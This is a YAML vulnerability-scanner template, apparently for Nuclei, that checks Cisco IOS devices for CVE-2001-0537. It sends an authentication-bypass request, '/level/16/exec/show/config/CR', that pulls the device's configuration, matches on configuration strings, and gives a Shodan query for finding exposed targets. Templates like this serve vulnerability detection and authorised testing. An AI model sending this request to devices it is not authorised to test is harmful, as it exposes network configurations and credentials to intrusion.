42 lines
1.2 KiB
YAML
42 lines
1.2 KiB
YAML
id: CVE-2001-0537
|
|
|
|
info:
|
|
name: Cisco IOS HTTP Configuration - Authentication Bypass
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: |
|
|
HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
|
|
reference:
|
|
- https://web.archive.org/web/20030720224553/https://www.securityfocus.com/bid/2936
|
|
- https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2001-0537
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
|
|
cve-id: CVE-2001-0537
|
|
cwe-id: CWE-287
|
|
cvss-score: 5.0
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
shodan-query: product:"Cisco IOS http config" && 200
|
|
tags: cve,cve2001,cisco,ios,auth-bypass
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/level/16/exec/show/config/CR'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'service config'
|
|
- 'Switch'
|
|
- 'default-gateway'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|